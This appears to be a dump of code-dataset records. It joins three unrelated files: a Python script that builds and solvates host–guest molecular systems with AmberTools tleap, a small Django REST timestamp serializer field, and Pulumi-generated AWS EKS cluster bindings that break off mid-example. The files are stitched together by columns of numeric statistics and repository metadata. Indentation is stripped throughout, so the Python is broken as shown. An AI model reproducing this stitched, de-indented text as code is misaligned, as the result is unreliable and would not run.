shutil.copy('tleap.in', 'tleap_solvate.in')
tleap_solvate = open('tleap_solvate.in', 'a')
tleap_solvate.write('# Load the guest parameters\n')
tleap_solvate.write('loadamberparams %s.frcmod\n'%(guest.lower()))
tleap_solvate.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
tleap_solvate.write('# Load the host parameters\n')
tleap_solvate.write('loadamberparams %s.frcmod\n'%(host.lower()))
tleap_solvate.write('%s = loadmol2 %s.mol2\n\n'%(hmol.upper(), host.lower()))
tleap_solvate.write('model = loadpdb build.pdb\n\n')
# Add bonds
if (comp == 'r' or comp == 'q'):
if len(host_bonds1) > 0:
for i in host_bonds1:
tleap_solvate.write('%s\n' % i)
elif (comp == 'v' or comp == 'e'):
if len(host_bonds2) > 0:
for i in host_bonds2:
tleap_solvate.write('%s\n' % i)
tleap_solvate.write('\n')
tleap_solvate.write('# Load the water and jc ion parameters\n')
tleap_solvate.write('source leaprc.water.%s\n'%(water_model.lower()))
tleap_solvate.write('loadamberparams frcmod.ionsjc_%s\n\n'%(water_model.lower()))
tleap_solvate.write('# Create water box with chosen model\n')
tleap_solvate.write('solvatebox model ' + water_box + ' {'+ str(buffer_x) +' '+ str(buffer_y) +' '+ str(buff) +'}\n\n')
if tleap_remove is not None:
tleap_solvate.write('# Remove a few waters manually\n')
for water in tleap_remove:
tleap_solvate.write('remove model model.%s\n' % water)
tleap_solvate.write('\n')
# Ionize/neutralize system
if (neut == 'no'):
tleap_solvate.write('# Add ions for neutralization/ionization\n')
tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[0], num_cat))
tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[1], num_ani))
elif (neut == 'yes'):
tleap_solvate.write('# Add ions for neutralization/ionization\n')
if neu_cat != 0:
tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[0], neu_cat))
if neu_ani != 0:
tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[1], neu_ani))
tleap_solvate.write('\n')
tleap_solvate.write('desc model\n')
tleap_solvate.write('savepdb model full.pdb\n')
tleap_solvate.write('saveamberparm model full.prmtop full.inpcrd\n')
tleap_solvate.write('quit')
tleap_solvate.close()
p = sp.call('tleap -s -f tleap_solvate.in > tleap_solvate.log', shell=True)
f = open('tleap_solvate.log', 'r')
for line in f:
if "Could not open file" in line:
print ('WARNING!!!')
print (line)
sys.exit(1)
if "WARNING: The unperturbed charge of the unit:" in line:
print (line)
print ('The system is not neutralized properly after solvation')
if "addIonsRand: Argument #2 is type String must be of type: [unit]" in line:
print('Aborted.The ion types specified in the input file could be wrong.')
print('Please check the tleap_solvate.log file, and the ion types specified in the input file.\n')
sys.exit(1)
f.close()
# Apply hydrogen mass repartitioning
print('Applying mass repartitioning...')
shutil.copy('../amber_files/parmed-hmr.in', './')
sp.call('parmed -O -n -i parmed-hmr.in > parmed-hmr.log', shell=True)
if stage != 'fe':
os.chdir('../')
def guest_box(guest, mol, lig_buffer, water_model, neut, ion_def, comp, amber_ff):
# Define volume density for different water models
if water_model == 'TIP3P':
water_box = water_model.upper()+'BOX'
elif water_model == 'SPCE':
water_box = 'SPCBOX'
elif water_model == 'TIP4PEW':
water_box = water_model.upper()+'BOX'
# Copy ligand parameter files
for file in glob.glob('../../ff/%s.*' %guest.lower()):
shutil.copy(file, './')
# Write and run preliminary tleap file
tleap_solvate = open('tmp_tleap.in', 'w')
tleap_solvate.write('source leaprc.'+amber_ff+'\n\n')
tleap_solvate.write('# Load the ligand parameters\n')
tleap_solvate.write('loadamberparams %s.frcmod\n'%(guest.lower()))
tleap_solvate.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
tleap_solvate.write('model = loadpdb %s.pdb\n\n' %(guest.lower()))
tleap_solvate.write('# Load the water and jc ion parameters\n')
tleap_solvate.write('source leaprc.water.%s\n'%(water_model.lower()))
tleap_solvate.write('loadamberparams frcmod.ionsjc_%s\n\n'%(water_model.lower()))
tleap_solvate.write('check model\n')
tleap_solvate.write('savepdb model vac.pdb\n')
tleap_solvate.write('saveamberparm model vac.prmtop vac.inpcrd\n\n')
tleap_solvate.write('# Create water box with chosen model\n')
tleap_solvate.write('solvatebox model ' + water_box + ' '+str(lig_buffer)+'\n\n')
tleap_solvate.write('quit\n')
tleap_solvate.close()
# Get box volume and number of added ions
box_volume = scripts.box_volume()
print(box_volume)
num_cations = round(0.85*ion_def[2]*6.02e23*box_volume*1e-27) # 0.85 factor to account for some shrinking of the box during equilibration
print(num_cations)
# Write and run tleap file
tleap_solvate = open('tleap_solvate.in', 'a')
tleap_solvate.write('source leaprc.'+amber_ff+'\n\n')
tleap_solvate.write('# Load the ligand parameters\n')
tleap_solvate.write('loadamberparams %s.frcmod\n'%(guest.lower()))
tleap_solvate.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
tleap_solvate.write('model = loadpdb %s.pdb\n\n' %(guest.lower()))
tleap_solvate.write('# Load the water and jc ion parameters\n')
tleap_solvate.write('source leaprc.water.%s\n'%(water_model.lower()))
tleap_solvate.write('loadamberparams frcmod.ionsjc_%s\n\n'%(water_model.lower()))
tleap_solvate.write('check model\n')
tleap_solvate.write('savepdb model vac.pdb\n')
tleap_solvate.write('saveamberparm model vac.prmtop vac.inpcrd\n\n')
tleap_solvate.write('# Create water box with chosen model\n')
tleap_solvate.write('solvatebox model ' + water_box + ' '+str(lig_buffer)+'\n\n')
if (neut == 'no'):
tleap_solvate.write('# Add ions for neutralization/ionization\n')
tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[0], num_cations))
tleap_solvate.write('addionsrand model %s 0\n' % (ion_def[1]))
elif (neut == 'yes'):
tleap_solvate.write('# Add ions for neutralization/ionization\n')
tleap_solvate.write('addionsrand model %s 0\n' % (ion_def[0]))
tleap_solvate.write('addionsrand model %s 0\n' % (ion_def[1]))
tleap_solvate.write('\n')
tleap_solvate.write('desc model\n')
tleap_solvate.write('savepdb model full.pdb\n')
tleap_solvate.write('saveamberparm model full.prmtop full.inpcrd\n')
tleap_solvate.write('quit\n')
tleap_solvate.close()
p = sp.call('tleap -s -f tleap_solvate.in > tleap_solvate.log', shell=True)
# Apply hydrogen mass repartitioning
print('Applying mass repartitioning...')
shutil.copy('../amber_files/parmed-hmr.in', './')
sp.call('parmed -O -n -i parmed-hmr.in > parmed-hmr.log', shell=True)
# Copy a few files for consistency
shutil.copy('./vac.pdb','./vac_guest.pdb')
shutil.copy('./vac.prmtop','./vac_guest.prmtop')
| 44.099647
| 515
| 0.585695
| 7,180
| 50,009
| 3.955571
| 0.065181
| 0.034647
| 0.040104
| 0.019647
| 0.867716
| 0.84916
| 0.823598
| 0.809056
| 0.791416
| 0.768811
| 0
| 0.024836
| 0.234318
| 50,009
| 1,133
| 516
| 44.13857
| 0.716879
| 0.090424
| 0
| 0.751412
| 0
| 0.012429
| 0.221194
| 0.036344
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00565
| false
| 0
| 0.010169
| 0
| 0.025989
| 0.054237
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b92493f07ad9cf44da54299f90a578af03a0afaf
| 216
|
py
|
Python
|
core/utils/customFields.py
|
likx2/HypeFans
|
9eb3ce6293d2aea218e13aedcf32796d0ab40507
|
[
"MIT"
] | null | null | null |
core/utils/customFields.py
|
likx2/HypeFans
|
9eb3ce6293d2aea218e13aedcf32796d0ab40507
|
[
"MIT"
] | null | null | null |
core/utils/customFields.py
|
likx2/HypeFans
|
9eb3ce6293d2aea218e13aedcf32796d0ab40507
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
class TimestampField(serializers.Field):
def to_representation(self, value):
return value.timestamp()
def to_internal_value(self, value):
return value
| 24
| 40
| 0.736111
| 25
| 216
| 6.2
| 0.64
| 0.064516
| 0.193548
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.194444
| 216
| 8
| 41
| 27
| 0.890805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
b93941a5034968dc8c10b95b666ea8b33582e830
| 48,648
|
py
|
Python
|
sdk/python/pulumi_aws/eks/cluster.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/eks/cluster.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/eks/cluster.py
|
dmelo/pulumi-aws
|
dd1a08d1fb93bab0d046aa410ca660f05ca0a58c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ClusterArgs', 'Cluster']
@pulumi.input_type
class ClusterArgs:
def __init__(__self__, *,
role_arn: pulumi.Input[str],
vpc_config: pulumi.Input['ClusterVpcConfigArgs'],
enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
encryption_config: Optional[pulumi.Input['ClusterEncryptionConfigArgs']] = None,
kubernetes_network_config: Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Cluster resource.
:param pulumi.Input[str] role_arn: ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
:param pulumi.Input['ClusterVpcConfigArgs'] vpc_config: Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
:param pulumi.Input[Sequence[pulumi.Input[str]]] enabled_cluster_log_types: List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
:param pulumi.Input['ClusterEncryptionConfigArgs'] encryption_config: Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
:param pulumi.Input['ClusterKubernetesNetworkConfigArgs'] kubernetes_network_config: Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
:param pulumi.Input[str] name: Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags.
:param pulumi.Input[str] version: Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
"""
pulumi.set(__self__, "role_arn", role_arn)
pulumi.set(__self__, "vpc_config", vpc_config)
if enabled_cluster_log_types is not None:
pulumi.set(__self__, "enabled_cluster_log_types", enabled_cluster_log_types)
if encryption_config is not None:
pulumi.set(__self__, "encryption_config", encryption_config)
if kubernetes_network_config is not None:
pulumi.set(__self__, "kubernetes_network_config", kubernetes_network_config)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Input[str]:
"""
ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter(name="vpcConfig")
def vpc_config(self) -> pulumi.Input['ClusterVpcConfigArgs']:
"""
Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
"""
return pulumi.get(self, "vpc_config")
@vpc_config.setter
def vpc_config(self, value: pulumi.Input['ClusterVpcConfigArgs']):
pulumi.set(self, "vpc_config", value)
@property
@pulumi.getter(name="enabledClusterLogTypes")
def enabled_cluster_log_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
"""
return pulumi.get(self, "enabled_cluster_log_types")
@enabled_cluster_log_types.setter
def enabled_cluster_log_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "enabled_cluster_log_types", value)
@property
@pulumi.getter(name="encryptionConfig")
def encryption_config(self) -> Optional[pulumi.Input['ClusterEncryptionConfigArgs']]:
"""
Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
"""
return pulumi.get(self, "encryption_config")
@encryption_config.setter
def encryption_config(self, value: Optional[pulumi.Input['ClusterEncryptionConfigArgs']]):
pulumi.set(self, "encryption_config", value)
@property
@pulumi.getter(name="kubernetesNetworkConfig")
def kubernetes_network_config(self) -> Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']]:
"""
Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
"""
return pulumi.get(self, "kubernetes_network_config")
@kubernetes_network_config.setter
def kubernetes_network_config(self, value: Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']]):
pulumi.set(self, "kubernetes_network_config", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value map of resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class _ClusterState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
certificate_authority: Optional[pulumi.Input['ClusterCertificateAuthorityArgs']] = None,
created_at: Optional[pulumi.Input[str]] = None,
enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
encryption_config: Optional[pulumi.Input['ClusterEncryptionConfigArgs']] = None,
endpoint: Optional[pulumi.Input[str]] = None,
identities: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterIdentityArgs']]]] = None,
kubernetes_network_config: Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
platform_version: Optional[pulumi.Input[str]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
vpc_config: Optional[pulumi.Input['ClusterVpcConfigArgs']] = None):
"""
Input properties used for looking up and filtering Cluster resources.
:param pulumi.Input[str] arn: ARN of the cluster.
:param pulumi.Input['ClusterCertificateAuthorityArgs'] certificate_authority: Attribute block containing `certificate-authority-data` for your cluster. Detailed below.
:param pulumi.Input[str] created_at: Unix epoch timestamp in seconds for when the cluster was created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] enabled_cluster_log_types: List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
:param pulumi.Input['ClusterEncryptionConfigArgs'] encryption_config: Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
:param pulumi.Input[str] endpoint: Endpoint for your Kubernetes API server.
:param pulumi.Input[Sequence[pulumi.Input['ClusterIdentityArgs']]] identities: Attribute block containing identity provider information for your cluster. Only available on Kubernetes version 1.13 and 1.14 clusters created or upgraded on or after September 3, 2019. Detailed below.
:param pulumi.Input['ClusterKubernetesNetworkConfigArgs'] kubernetes_network_config: Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
:param pulumi.Input[str] name: Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
:param pulumi.Input[str] platform_version: Platform version for the cluster.
:param pulumi.Input[str] role_arn: ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
:param pulumi.Input[str] status: Status of the EKS cluster. One of `CREATING`, `ACTIVE`, `DELETING`, `FAILED`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider.
:param pulumi.Input[str] version: Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
:param pulumi.Input['ClusterVpcConfigArgs'] vpc_config: Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if certificate_authority is not None:
pulumi.set(__self__, "certificate_authority", certificate_authority)
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if enabled_cluster_log_types is not None:
pulumi.set(__self__, "enabled_cluster_log_types", enabled_cluster_log_types)
if encryption_config is not None:
pulumi.set(__self__, "encryption_config", encryption_config)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if identities is not None:
pulumi.set(__self__, "identities", identities)
if kubernetes_network_config is not None:
pulumi.set(__self__, "kubernetes_network_config", kubernetes_network_config)
if name is not None:
pulumi.set(__self__, "name", name)
if platform_version is not None:
pulumi.set(__self__, "platform_version", platform_version)
if role_arn is not None:
pulumi.set(__self__, "role_arn", role_arn)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if version is not None:
pulumi.set(__self__, "version", version)
if vpc_config is not None:
pulumi.set(__self__, "vpc_config", vpc_config)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the cluster.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="certificateAuthority")
def certificate_authority(self) -> Optional[pulumi.Input['ClusterCertificateAuthorityArgs']]:
"""
Attribute block containing `certificate-authority-data` for your cluster. Detailed below.
"""
return pulumi.get(self, "certificate_authority")
@certificate_authority.setter
def certificate_authority(self, value: Optional[pulumi.Input['ClusterCertificateAuthorityArgs']]):
pulumi.set(self, "certificate_authority", value)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
Unix epoch timestamp in seconds for when the cluster was created.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter(name="enabledClusterLogTypes")
def enabled_cluster_log_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the desired control plane logging to enable. For more information, see [Amazon EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html).
"""
return pulumi.get(self, "enabled_cluster_log_types")
@enabled_cluster_log_types.setter
def enabled_cluster_log_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "enabled_cluster_log_types", value)
@property
@pulumi.getter(name="encryptionConfig")
def encryption_config(self) -> Optional[pulumi.Input['ClusterEncryptionConfigArgs']]:
"""
Configuration block with encryption configuration for the cluster. Only available on Kubernetes 1.13 and above clusters created after March 6, 2020. Detailed below.
"""
return pulumi.get(self, "encryption_config")
@encryption_config.setter
def encryption_config(self, value: Optional[pulumi.Input['ClusterEncryptionConfigArgs']]):
pulumi.set(self, "encryption_config", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
Endpoint for your Kubernetes API server.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def identities(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ClusterIdentityArgs']]]]:
"""
Attribute block containing identity provider information for your cluster. Only available on Kubernetes version 1.13 and 1.14 clusters created or upgraded on or after September 3, 2019. Detailed below.
"""
return pulumi.get(self, "identities")
@identities.setter
def identities(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterIdentityArgs']]]]):
pulumi.set(self, "identities", value)
@property
@pulumi.getter(name="kubernetesNetworkConfig")
def kubernetes_network_config(self) -> Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']]:
"""
Configuration block with kubernetes network configuration for the cluster. Detailed below. If removed, this provider will only perform drift detection if a configuration value is provided.
"""
return pulumi.get(self, "kubernetes_network_config")
@kubernetes_network_config.setter
def kubernetes_network_config(self, value: Optional[pulumi.Input['ClusterKubernetesNetworkConfigArgs']]):
pulumi.set(self, "kubernetes_network_config", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the cluster. Must be between 1-100 characters in length. Must begin with an alphanumeric character, and must only contain alphanumeric characters, dashes and underscores (`^[0-9A-Za-z][A-Za-z0-9\-_]+$`).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="platformVersion")
def platform_version(self) -> Optional[pulumi.Input[str]]:
"""
Platform version for the cluster.
"""
return pulumi.get(self, "platform_version")
@platform_version.setter
def platform_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "platform_version", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> Optional[pulumi.Input[str]]:
"""
ARN of the IAM role that provides permissions for the Kubernetes control plane to make calls to AWS API operations on your behalf.
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Status of the EKS cluster. One of `CREATING`, `ACTIVE`, `DELETING`, `FAILED`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value map of resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of tags assigned to the resource, including those inherited from the provider.
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Desired Kubernetes master version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except those automatically triggered by EKS. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by EKS.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="vpcConfig")
def vpc_config(self) -> Optional[pulumi.Input['ClusterVpcConfigArgs']]:
"""
Configuration block for the VPC associated with your cluster. Amazon EKS VPC resources have specific requirements to work properly with Kubernetes. For more information, see [Cluster VPC Considerations](https://docs.aws.amazon.com/eks/latest/userguide/network_reqs.html) and [Cluster Security Group Considerations](https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html) in the Amazon EKS User Guide. Detailed below. Also contains attributes detailed in the Attributes section.
"""
return pulumi.get(self, "vpc_config")
@vpc_config.setter
def vpc_config(self, value: Optional[pulumi.Input['ClusterVpcConfigArgs']]):
pulumi.set(self, "vpc_config", value)
class Cluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
enabled_cluster_log_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
encryption_config: Optional[pulumi.Input[pulumi.InputType['ClusterEncryptionConfigArgs']]] = None,
kubernetes_network_config: Optional[pulumi.Input[pulumi.InputType['ClusterKubernetesNetworkConfigArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
vpc_config: Optional[pulumi.Input[pulumi.InputType['ClusterVpcConfigArgs']]] = None,
__props__=None):
"""
Manages an EKS Cluster.
## Example Usage
### Basic Usage
```python
import pulumi
import pulumi_aws as aws
example = aws.eks.Cluster("example",
role_arn=aws_iam_role["example"]["arn"],
vpc_config=aws.eks.ClusterVpcConfigArgs(
subnet_ids=[
aws_subnet["example1"]["id"],
aws_subnet["example2"]["id"],
],
),
opts=pulumi.ResourceOptions(depends_on=[
aws_iam_role_policy_attachment["example-AmazonEKSClusterPolicy"],
aws_iam_role_policy_attachment["example-AmazonEKSVPCResourceController"],
]))
pulumi.export("endpoint", example.endpoint)
pulumi.export("kubeconfig-certificate-authority-data", example.certificate_authority.data)
```
### Example IAM Role for EKS Cluster
```python
import pulumi
import pulumi_aws as aws
example = aws.iam.Role("example", assume_role_policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "eks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
\"\"\")
example__amazon_eks_cluster_policy = aws.iam.RolePolicyAttachment("example-AmazonEKSClusterPolicy",
policy_arn="arn:aws:iam::aws:policy/AmazonEKSClusterPolicy",
role=example.name)
# Optionally, enable Security Groups for Pods
# Reference: https://docs.aws.amazon.com/eks/latest/userguide/security-groups-for-pods.html
example__amazon_eksvpc_resource_controller = aws.iam.RolePolicyAttachment("example-AmazonEKSVPCResourceController",
policy_arn="arn:aws:iam::aws:policy/AmazonEKSVPCResourceController",
role=example.name)
```
### Enabling Control Plane Logging
[EKS Control Plane Logging](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html) can be enabled via the `enabled_cluster_log_types` argument. To manage the CloudWatch Log Group retention period, the `cloudwatch.LogGroup` resource can be used.
> The below configuration uses [`dependsOn`](https://www.pulumi.com/docs/intro/concepts/programming-model/#dependson) to prevent ordering issues with EKS automatically creating the log group first and a variable for naming consistency. Other ordering and naming methodologies may be more appropriate for your environment.
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
cluster_name = config.get("clusterName")
if cluster_name is None:
cluster_name = "example"
example_log_group = aws.cloudwatch.LogGroup("exampleLogGroup", retention_in_days=7)
# ... potentially other configuration ...
example_cluster = aws.eks.Cluster("exampleCluster", enabled_cluster_log_types=[
"api",
